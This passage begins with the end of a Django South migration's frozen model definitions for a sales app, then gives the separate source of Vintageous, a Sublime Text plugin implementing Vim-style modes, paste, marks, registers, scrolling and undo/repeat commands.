'related_user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.AccessEntity']", 'null': 'True', 'blank': 'True'})
},
'identities.contactfield': {
'Meta': {'ordering': "['name']", 'object_name': 'ContactField', '_ormbases': ['core.Object']},
'allowed_values': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'field_type': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'required': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'identities.contacttype': {
'Meta': {'ordering': "['name']", 'object_name': 'ContactType', '_ormbases': ['core.Object']},
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'fields': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['identities.ContactField']", 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
'sales.lead': {
'Meta': {'ordering': "['contact']", 'object_name': 'Lead', '_ormbases': ['core.Object']},
'assigned': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'sales_lead_assigned'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"}),
'contact': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['identities.Contact']"}),
'contact_method': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'products_interested': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['sales.Product']", 'null': 'True', 'blank': 'True'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.SaleSource']", 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.SaleStatus']"})
},
'sales.opportunity': {
'Meta': {'ordering': "['-expected_date']", 'object_name': 'Opportunity', '_ormbases': ['core.Object']},
'amount': ('django.db.models.fields.DecimalField', [], {'max_digits': '20', 'decimal_places': '2'}),
'amount_currency': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Currency']"}),
'amount_display': ('django.db.models.fields.DecimalField', [], {'max_digits': '20', 'decimal_places': '2'}),
'assigned': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'sales_opportunity_assigned'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"}),
'closed_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'contact': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['identities.Contact']"}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'expected_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'lead': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.Lead']", 'null': 'True', 'blank': 'True'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'probability': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '3', 'decimal_places': '0', 'blank': 'True'}),
'products_interested': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sales.Product']", 'symmetrical': 'False'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.SaleSource']", 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.SaleStatus']"})
},
'sales.orderedproduct': {
'Meta': {'ordering': "['product']", 'object_name': 'OrderedProduct', '_ormbases': ['core.Object']},
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'discount': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '4', 'decimal_places': '2'}),
'fulfilled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.SaleOrder']"}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.Product']"}),
'quantity': ('django.db.models.fields.DecimalField', [], {'default': '1', 'max_digits': '30', 'decimal_places': '2'}),
'rate': ('django.db.models.fields.DecimalField', [], {'max_digits': '20', 'decimal_places': '2'}),
'rate_display': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
'subscription': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.Subscription']", 'null': 'True', 'blank': 'True'}),
'tax': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Tax']", 'null': 'True', 'blank': 'True'})
},
'sales.product': {
'Meta': {'ordering': "['code']", 'object_name': 'Product', '_ormbases': ['core.Object']},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'buy_price': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
'code': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'child_set'", 'null': 'True', 'to': "orm['sales.Product']"}),
'product_type': ('django.db.models.fields.CharField', [], {'default': "'good'", 'max_length': '32'}),
'runout_action': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'sell_price': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
'stock_quantity': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'supplier': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['identities.Contact']", 'null': 'True', 'blank': 'True'}),
'supplier_code': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
'sales.saleorder': {
'Meta': {'ordering': "['-datetime']", 'object_name': 'SaleOrder', '_ormbases': ['core.Object']},
'assigned': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'sales_saleorder_assigned'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"}),
'client': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['identities.Contact']", 'null': 'True', 'blank': 'True'}),
'currency': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Currency']"}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'opportunity': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.Opportunity']", 'null': 'True', 'blank': 'True'}),
'payment': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['finance.Transaction']", 'null': 'True', 'blank': 'True'}),
'reference': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.SaleSource']"}),
'status': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.SaleStatus']"}),
'total': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
'total_display': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'})
},
'sales.salesource': {
'Meta': {'ordering': "('-active', 'name')", 'object_name': 'SaleSource', '_ormbases': ['core.Object']},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'})
},
'sales.salestatus': {
'Meta': {'ordering': "('hidden', '-active', 'name')", 'object_name': 'SaleStatus', '_ormbases': ['core.Object']},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'hidden': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'use_leads': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'use_opportunities': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'use_sales': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'sales.subscription': {
'Meta': {'ordering': "['expiry']", 'object_name': 'Subscription', '_ormbases': ['core.Object']},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'client': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['identities.Contact']", 'null': 'True', 'blank': 'True'}),
'cycle_end': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'cycle_period': ('django.db.models.fields.CharField', [], {'default': "'month'", 'max_length': '32'}),
'details': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'expiry': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.Product']", 'null': 'True', 'blank': 'True'}),
'start': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime.now'})
}
}
# South migration metadata: restrict this migration's frozen ORM to the 'sales' app.
complete_apps = ['sales']
| |
import sublime
import sublime_plugin
from Vintageous.state import IrreversibleTextCommand
from Vintageous.state import VintageState
from Vintageous.vi import utils
from Vintageous.vi.constants import _MODE_INTERNAL_NORMAL
from Vintageous.vi.constants import MODE_INSERT
from Vintageous.vi.constants import MODE_NORMAL
from Vintageous.vi.constants import MODE_VISUAL
from Vintageous.vi.constants import MODE_VISUAL_LINE
from Vintageous.vi.constants import regions_transformer
from Vintageous.vi.registers import REG_EXPRESSION
class ViEditAtEol(sublime_plugin.TextCommand):
    """Vim 'A': enter insert mode with every caret moved to its line's hard EOL."""

    def run(self, edit, extend=False):
        VintageState(self.view).enter_insert_mode()
        self.view.run_command('collapse_to_direction')

        old_sels = list(self.view.sel())
        self.view.sel().clear()

        # Collapse each selection to the end of its own line.
        for eol in (self.view.line(r.b).end() for r in old_sels):
            self.view.sel().add(sublime.Region(eol, eol))
class ViEditAfterCaret(sublime_plugin.TextCommand):
    """Vim 'a': enter insert mode one character after the caret, or at the end
    of the selection when coming from a visual selection."""

    def run(self, edit, extend=False):
        VintageState(self.view).enter_insert_mode()

        was_visual = self.view.has_non_empty_selection_region()
        old_sels = list(self.view.sel())
        self.view.sel().clear()

        for r in old_sels:
            pt = r.end()
            # In normal mode, step past the caret unless that would cross EOL.
            if not was_visual and not utils.is_at_eol(self.view, r):
                pt += 1
            self.view.sel().add(sublime.Region(pt, pt))
class _vi_big_i(sublime_plugin.TextCommand):
    """Vim 'I': enter insert mode at the first non-blank character of the line."""

    def run(self, edit, extend=False):
        def to_soft_bol(view, sel):
            line_start = view.line(sel.b).a
            first_char = utils.next_non_white_space_char(view, line_start)
            return sublime.Region(first_char, first_char)

        VintageState(self.view).enter_insert_mode()
        regions_transformer(self.view, to_soft_bol)
class ViPaste(sublime_plugin.TextCommand):
    """Vim 'p': paste register contents after the caret.

    Linewise fragments (ending in a newline) are pasted below the current
    line; charwise fragments are inserted just after the caret. In visual
    modes the selection is replaced instead of inserting.
    """

    def run(self, edit, register=None, count=1):
        state = VintageState(self.view)
        if register:
            fragments = state.registers[register]
        else:
            # TODO: There should be a simpler way of getting the unnamed register's content.
            fragments = state.registers['"']

        if not fragments:
            print("Vintageous: Nothing in register \".")
            # XXX: This won't ever be printed because it will be overwritten by other status
            # messages printed right after this one.
            sublime.status_message("Vintageous: Nothing in register \".")
            return

        sels = list(self.view.sel())
        # Pair each selection with a fragment; if the counts differ, reuse
        # the first fragment for every selection.
        if len(sels) == len(fragments):
            sel_frag = zip(sels, fragments)
        else:
            sel_frag = zip(sels, [fragments[0],] * len(sels))

        # `offset` compensates for text already inserted ahead of later selections.
        offset = 0
        for s, text in sel_frag:
            text = self.prepare_fragment(text)
            if text.startswith('\n'):
                # Linewise paste: insert after the end of the current line.
                if utils.is_at_eol(self.view, s) or utils.is_at_bol(self.view, s):
                    self.paste_all(edit, s, self.view.line(s.b).b, text, count)
                else:
                    self.paste_all(edit, s, self.view.line(s.b - 1).b, text, count)
            else:
                # XXX: Refactor this whole class. It's getting out of hand.
                # Charwise paste: insert after the caret, but not past EOL.
                if self.view.substr(s.b) == '\n':
                    self.paste_all(edit, s, s.b + offset, text, count)
                else:
                    self.paste_all(edit, s, s.b + offset + 1, text, count)
            offset += len(text) * count

    def prepare_fragment(self, text):
        # Normalize a linewise fragment ("foo<newline>") into "<newline>foo"
        # so it can be appended at the end of the preceding line.
        if text.endswith('\n') and text != '\n':
            text = '\n' + text[0:-1]
        return text

    # TODO: Improve this signature.
    def paste_all(self, edit, sel, at, text, count):
        # Insert `text` `count` times at point `at`, or — in visual modes —
        # replace the selection with the repeated text.
        state = VintageState(self.view)
        if state.mode not in (MODE_VISUAL, MODE_VISUAL_LINE):
            # TODO: generate string first, then insert?
            # Make sure we can paste at EOF.
            at = at if at <= self.view.size() else self.view.size()
            for x in range(count):
                self.view.insert(edit, at, text)
        else:
            if text.startswith('\n'):
                text = text * count
                if not text.endswith('\n'):
                    text = text + '\n'
            else:
                text = text * count

            if state.mode == MODE_VISUAL_LINE:
                if text.startswith('\n'):
                    text = text[1:]

            self.view.replace(edit, sel, text)
class ViPasteBefore(sublime_plugin.TextCommand):
    """Vim 'P': paste register contents before the caret.

    Linewise fragments (ending in a newline) are pasted above the current
    line; charwise fragments are inserted at the caret. In visual modes the
    selection is replaced instead of inserting.
    """

    def run(self, edit, register=None, count=1):
        state = VintageState(self.view)
        if register:
            fragments = state.registers[register]
        else:
            # TODO: There should be a simpler way of getting the unnamed register's content.
            fragments = state.registers['"']

        sels = list(self.view.sel())
        # Pair each selection with a fragment; if the counts differ, reuse
        # the first fragment for every selection.
        if len(sels) == len(fragments):
            sel_frag = zip(sels, fragments)
        else:
            sel_frag = zip(sels, [fragments[0],] * len(sels))

        # `offset` compensates for text already inserted ahead of later selections.
        offset = 0
        for s, text in sel_frag:
            if text.endswith('\n'):
                # Linewise paste: insert at the start of the current line.
                if utils.is_at_eol(self.view, s) or utils.is_at_bol(self.view, s):
                    self.paste_all(edit, s, self.view.line(s.b).a, text, count)
                else:
                    self.paste_all(edit, s, self.view.line(s.b - 1).a, text, count)
            else:
                # Charwise paste: insert at the caret.
                self.paste_all(edit, s, s.b + offset, text, count)
            offset += len(text) * count

    def paste_all(self, edit, sel, at, text, count):
        # Insert `text` `count` times at point `at`, or — in visual modes —
        # replace the selection with the repeated text.
        state = VintageState(self.view)
        if state.mode not in (MODE_VISUAL, MODE_VISUAL_LINE):
            for x in range(count):
                self.view.insert(edit, at, text)
        else:
            if text.endswith('\n'):
                text = text * count
                if not text.startswith('\n'):
                    text = '\n' + text
            else:
                text = text * count
            self.view.replace(edit, sel, text)
class ViEnterNormalMode(sublime_plugin.TextCommand):
    """Switch to normal mode, remembering visual selections for 'gv'."""

    def run(self, edit):
        state = VintageState(self.view)
        # Save the visual region first so _vi_g_v can restore it later.
        if state.mode == MODE_VISUAL:
            state.store_visual_selections()

        for cmd in ('collapse_to_direction', 'dont_stay_on_eol_backward'):
            self.view.run_command(cmd)
        state.enter_normal_mode()
class ViEnterNormalModeFromInsertMode(sublime_plugin.TextCommand):
    """Leave insert mode: move each caret one character left (Vim behavior)
    unless it already sits at the beginning of its line."""

    def run(self, edit):
        old_sels = list(self.view.sel())
        self.view.sel().clear()

        for r in old_sels:
            if r.a > r.b:
                # Reversed region: keep it as-is.
                self.view.sel().add(r)
                continue
            pt = r.a if self.view.line(r.a).a == r.a else r.a - 1
            self.view.sel().add(sublime.Region(pt, pt))

        VintageState(self.view).enter_normal_mode()
        self.view.window().run_command('hide_auto_complete')
class ViEnterInsertMode(sublime_plugin.TextCommand):
    """Enter insert mode with carets collapsed in the direction of motion."""

    def run(self, edit):
        VintageState(self.view).enter_insert_mode()
        self.view.run_command('collapse_to_direction')
class ViEnterVisualMode(sublime_plugin.TextCommand):
    """Enter visual mode; make every selection at least one character wide."""

    def run(self, edit):
        VintageState(self.view).enter_visual_mode()
        self.view.run_command('extend_to_minimal_width')
class ViEnterVisualLineMode(sublime_plugin.TextCommand):
    """Enter linewise visual mode."""

    def run(self, edit):
        VintageState(self.view).enter_visual_line_mode()
class ViEnterReplaceMode(sublime_plugin.TextCommand):
    """Enter replace mode ('R') and clear any pending command state."""

    def run(self, edit):
        vstate = VintageState(self.view)
        vstate.enter_replace_mode()
        self.view.run_command('collapse_to_direction')
        vstate.reset()
class SetAction(IrreversibleTextCommand):
    """Record the next action in the command state machine and evaluate it."""

    def __init__(self, view):
        IrreversibleTextCommand.__init__(self, view)

    def run(self, action):
        vstate = VintageState(self.view)
        vstate.action = action
        vstate.eval()
class SetMotion(IrreversibleTextCommand):
    """Record the next motion in the command state machine and evaluate it."""

    def __init__(self, view):
        IrreversibleTextCommand.__init__(self, view)

    def run(self, motion):
        vstate = VintageState(self.view)
        vstate.motion = motion
        vstate.eval()
class ViPushDigit(sublime_plugin.TextCommand):
    """Accumulate a count digit: before any action/motion it belongs to the
    motion count; once an action is pending, to the action count."""

    def run(self, edit, digit):
        state = VintageState(self.view)
        if not state.action and not state.motion:
            state.push_motion_digit(digit)
        elif state.action:
            state.push_action_digit(digit)
class ViReverseCaret(sublime_plugin.TextCommand):
    """Vim 'o' in visual mode: swap the anchor and the caret of each selection."""

    def run(self, edit):
        flipped = [sublime.Region(r.b, r.a) for r in list(self.view.sel())]
        self.view.sel().clear()
        for region in flipped:
            self.view.sel().add(region)
class ViEnterNormalInsertMode(sublime_plugin.TextCommand):
    """Start a counted insert (e.g. 5i): open an undo group that will be
    glued together once the user leaves insert mode."""

    def run(self, edit):
        VintageState(self.view).enter_normal_insert_mode()
        # FIXME: We can't repeat 5ifoo<esc>
        self.view.run_command('mark_undo_groups_for_gluing')
        # ...User types text...
class ViRunNormalInsertModeActions(sublime_plugin.TextCommand):
    """Finish a counted insert (5ifoo<esc>): replay the typed text count-1
    times, then drop back to normal mode."""

    def run(self, edit):
        state = VintageState(self.view)
        # Close the undo group opened by ViEnterNormalInsertMode.
        self.view.run_command('glue_marked_undo_groups')

        # FIXME: We can't repeat 5ifoo<esc> after we're done.
        repeats = state.count - 1
        for _ in range(repeats):
            self.view.run_command('repeat')

        # Switch mode first so reset() wipes the pending count.
        state.mode = MODE_NORMAL
        state.reset()
        self.view.run_command('vi_enter_normal_mode_from_insert_mode')
class SetRegister(sublime_plugin.TextCommand):
    """Select the register for the next command ("x); the expression register
    is delegated to vi_expression_register."""

    def run(self, edit, character=None):
        state = VintageState(self.view)
        if character is None:
            # First key press: wait for the register name.
            state.expecting_register = True
            return
        if character == REG_EXPRESSION:
            self.view.run_command('vi_expression_register')
            return
        state.register = character
        state.expecting_register = False
class ViExpressionRegister(sublime_plugin.TextCommand):
    """Prompt for a Python expression (Vim's expression register).

    The evaluated result is stored in the expression register, or inserted
    into the buffer when `insert` is True. `next_mode` is accepted for API
    compatibility but unused here.
    """

    def run(self, edit, insert=False, next_mode=None):
        def on_done(s):
            state = VintageState(self.view)
            try:
                # NOTE: eval() of user-typed text is intentional here — it
                # implements Vim's expression register — but it does run
                # arbitrary code typed into the panel.
                rv = [str(eval(s, None, None)),]
                if not insert:
                    # TODO: We need to sort out the values received and sent to registers. When pasting,
                    # we assume a list... This should be encapsulated in Registers.
                    state.registers[REG_EXPRESSION] = rv
                else:
                    self.view.run_command('insert_snippet', {'contents': str(rv[0])})
                    state.reset()
            except Exception:
                # FIX: was a bare `except:`, which also swallowed SystemExit
                # and KeyboardInterrupt; only evaluation errors belong here.
                sublime.status_message("Vintageous: Invalid expression.")
                on_cancel()

        def on_cancel():
            state = VintageState(self.view)
            state.reset()

        self.view.window().show_input_panel('', '', on_done, None, on_cancel)
class ViR(sublime_plugin.TextCommand):
    """Vim 'r': first call arms the action and waits for the replacement
    character; second call supplies it and evaluates."""

    def run(self, edit, character=None):
        state = VintageState(self.view)
        if character is None:
            state.action = 'vi_r'
            state.expecting_user_input = True
            return
        state.user_input = character
        state.expecting_user_input = False
        state.eval()
class ViM(sublime_plugin.TextCommand):
    """Vim 'm': arm the set-mark action and wait for the mark name."""

    def run(self, edit, character=None):
        vstate = VintageState(self.view)
        vstate.action = 'vi_m'
        vstate.expecting_user_input = True
class _vi_m(sublime_plugin.TextCommand):
    """Store the current position under mark `character`."""

    def run(self, edit, character=None):
        VintageState(self.view).marks.add(character, self.view)
class ViQuote(sublime_plugin.TextCommand):
    """Vim '`'/quote: arm the go-to-mark motion and wait for the mark name."""

    def run(self, edit, character=None):
        vstate = VintageState(self.view)
        vstate.motion = 'vi_quote'
        vstate.expecting_user_input = True
class _vi_quote(sublime_plugin.TextCommand):
    """Jump to the mark named `character`.

    The mark may resolve to a region in this view (a motion), a file path
    (opened at an encoded position), or an encoded command string.
    """

    def run(self, edit, mode=None, character=None, extend=False):
        def f(view, s):
            # Transform each selection towards the mark's position.
            if mode == MODE_VISUAL:
                if s.a <= s.b:
                    if address.b < s.b:
                        # Jumping backwards past the caret: flip around the anchor.
                        return sublime.Region(s.a + 1, address.b)
                    else:
                        return sublime.Region(s.a, address.b)
                else:
                    return sublime.Region(s.a + 1, address.b)
            elif mode == MODE_NORMAL:
                return address
            elif mode == _MODE_INTERNAL_NORMAL:
                # Motion used as the target of an operator (e.g. d'a).
                return sublime.Region(s.a, address.b)

            return s

        state = VintageState(self.view)
        address = state.marks.get_as_encoded_address(character)

        if address is None:
            return

        if isinstance(address, str):
            if not address.startswith('<command'):
                self.view.window().open_file(address, sublime.ENCODED_POSITION)
            else:
                # We get a command in this form: <command _vi_double_quote>
                self.view.run_command(address.split(' ')[1][:-1])
            return

        # This is a motion in a composite command.
        regions_transformer(self.view, f)
class ViF(sublime_plugin.TextCommand):
    """Vim 'f': arm the find-character motion and wait for the target char."""

    def run(self, edit, character=None):
        state = VintageState(self.view)
        if character is None:
            state.motion = 'vi_f'
            state.expecting_user_input = True
            return
        # FIXME: Dead code?
        state.user_input = character
        state.expecting_user_input = False
        state.eval()
class ViT(IrreversibleTextCommand):
    """Vim 't': arm the till-character motion and wait for the target char."""
    # XXX: Compare to ViBigF.

    def __init__(self, view):
        IrreversibleTextCommand.__init__(self, view)

    def run(self, character=None):
        state = VintageState(self.view)
        if character is None:
            state.motion = 'vi_t'
            state.expecting_user_input = True
            return
        state.user_input = character
        state.expecting_user_input = False
        state.eval()
class ViBigT(IrreversibleTextCommand):
    """Vim 'T': arm the backwards till-character motion and wait for the char."""
    # XXX: Compare to ViBigF.

    def __init__(self, view):
        IrreversibleTextCommand.__init__(self, view)

    def run(self, character=None):
        state = VintageState(self.view)
        if character is None:
            state.motion = 'vi_big_t'
            state.expecting_user_input = True
            return
        state.user_input = character
        state.expecting_user_input = False
        state.eval()
class ViBigF(IrreversibleTextCommand):
    """Vim 'F': arm the backwards find-character motion."""

    def __init__(self, view):
        IrreversibleTextCommand.__init__(self, view)

    def run(self):
        vstate = VintageState(self.view)
        vstate.motion = 'vi_big_f'
        vstate.expecting_user_input = True
class ViI(IrreversibleTextCommand):
    """Arm a text-object motion: inclusive ('a') or exclusive ('i')."""

    def __init__(self, view):
        IrreversibleTextCommand.__init__(self, view)

    def run(self, inclusive=False):
        state = VintageState(self.view)
        state.motion = ('vi_inclusive_text_object' if inclusive
                        else 'vi_exclusive_text_object')
        state.expecting_user_input = True
class CollectUserInput(IrreversibleTextCommand):
    """Receive the pending single-character argument and re-evaluate the state."""

    def __init__(self, view):
        IrreversibleTextCommand.__init__(self, view)

    def run(self, character=None):
        vstate = VintageState(self.view)
        vstate.user_input = character
        vstate.expecting_user_input = False
        vstate.eval()
class _vi_z_enter(IrreversibleTextCommand):
    """Vim 'z<CR>': scroll so the caret's line becomes the top of the view."""

    def __init__(self, view):
        IrreversibleTextCommand.__init__(self, view)

    def run(self):
        caret = self.view.sel()[0].b
        caret_row = self.view.rowcol(caret)[0] - 1
        top_row = self.view.rowcol(self.view.visible_region().a)[0]
        self.view.run_command('scroll_lines', {'amount': top_row - caret_row})
class _vi_z_minus(IrreversibleTextCommand):
    """Vim 'z-': scroll so the caret's line moves towards the bottom of the view."""

    def __init__(self, view):
        IrreversibleTextCommand.__init__(self, view)

    def run(self):
        caret_row = self.view.rowcol(self.view.sel()[0].b)[0]
        bottom_row = self.view.rowcol(self.view.visible_region().b)[0]
        delta = (bottom_row - caret_row) - 1
        if delta > 1:
            self.view.run_command('scroll_lines', {'amount': delta})
class _vi_zz(IrreversibleTextCommand):
    """Vim 'zz': scroll so the caret's line is vertically centered."""

    def __init__(self, view):
        IrreversibleTextCommand.__init__(self, view)

    def run(self):
        caret_row = self.view.rowcol(self.view.sel()[0].b)[0]
        top_row, _ = self.view.rowcol(self.view.visible_region().a)
        bottom_row, _ = self.view.rowcol(self.view.visible_region().b)
        # FIX: `/` yields a float under Python 3 (Sublime Text 3), but
        # 'scroll_lines' expects a whole number of lines; use floor division.
        middle_row = (top_row + bottom_row) // 2
        self.view.run_command('scroll_lines', {'amount': middle_row - caret_row})
class _vi_r(sublime_plugin.TextCommand):
    """Vim 'r': replace every selected character with `character`."""

    def run(self, edit, character=None, mode=None):
        if mode != _MODE_INTERNAL_NORMAL:
            return
        for region in self.view.sel():
            replacement = character * region.size()
            self.view.replace(edit, region, replacement)
class _vi_undo(IrreversibleTextCommand):
    """Once the latest vi command has been undone, we might be left with non-empty selections.
    This is due to the fact that Vintageous defines selections in a separate step to the actual
    command running. For example, v,e,d,u would undo the deletion operation and restore the
    selection that v,e had created.

    Assuming that after an undo we're back in normal mode, we can take for granted that any leftover
    selections must be destroyed. I cannot think of any situation where Vim would have to restore
    selections after *u*, but it may well happen under certain circumstances I'm not aware of.

    Note 1: We are also relying on Sublime Text to restore the v or V selections existing at the
    time the edit command was run. This seems to be safe, but we're blindly relying on it.

    Note 2: Vim knows the position the caret was in before creating the visual selection. In
    Sublime Text we lose that information (at least it doesn't seem to be straightforward to
    obtain).
    """
    # !!! This is a special command that does not go through the usual processing. !!!
    # !!! It must skip the undo stack. !!!

    # TODO: It must be possible store or retrieve the actual position of the caret before the
    # visual selection performed by the user.
    def run(self):
        # We define our own transformer here because we want to handle undo as a special case.
        # TODO: I don't know if it needs to be an special case in reality.
        def f(view, s):
            # Compensates the move issued below.
            if s.a < s.b:
                return sublime.Region(s.a + 1, s.a + 1)
            else:
                return sublime.Region(s.a, s.a)

        state = VintageState(self.view)
        # Run Sublime's undo once per pending count (e.g. 3u).
        for i in range(state.count):
            self.view.run_command('undo')

        # Collapse any selections the undo left behind (see class docstring).
        if self.view.has_non_empty_selection_region():
            regions_transformer(self.view, f)

        # !! HACK !! /////////////////////////////////////////////////////////
        # This is a hack to work around an issue in Sublime Text:
        # When undoing in normal mode, Sublime Text seems to prime a move by chars
        # forward that has never been requested by the user or Vintageous.
        # As far as I can tell, Vintageous isn't at fault here, but it seems weird
        # to think that Sublime Text is wrong.
        self.view.run_command('move', {'by': 'characters', 'forward': False})
        # ////////////////////////////////////////////////////////////////////

        state.update_xpos()
        # Ensure that we wipe the count, if any.
        state.reset()
class _vi_repeat(IrreversibleTextCommand):
    """Vintageous manages the repeat operation on its own to ensure that we always use the latest
    modifying command, instead of being tied to the undo stack (as Sublime Text is by default).
    """
    # !!! This is a special command that does not go through the usual processing. !!!
    # !!! It must skip the undo stack. !!!
    def run(self):
        state = VintageState(self.view)
        try:
            cmd, args, _ = state.repeat_command
        except TypeError:
            # Unreachable.
            return

        if not cmd:
            return
        elif cmd == 'vi_run':
            # Replay a single command, folding the new count into the stored one.
            args['next_mode'] = MODE_NORMAL
            args['follow_up_mode'] = 'vi_enter_normal_mode'
            args['count'] = state.count * args['count']
            self.view.run_command(cmd, args)
        elif cmd == 'sequence':
            for i, _ in enumerate(args['commands']):
                # Access this shape: {"commands":[['vi_run', {"foo": 100}],...]}
                args['commands'][i][1]['next_mode'] = MODE_NORMAL
                args['commands'][i][1]['follow_up_mode'] = 'vi_enter_normal_mode'

            # TODO: Implement counts properly for 'sequence' command.
            for i in range(state.count):
                self.view.run_command(cmd, args)

        # Ensure we wipe count data if any.
        state.reset()
        # XXX: Needed here? Maybe enter_... type commands should be IrreversibleCommands so we
        # must/can call them whenever we need them without affecting the undo stack.
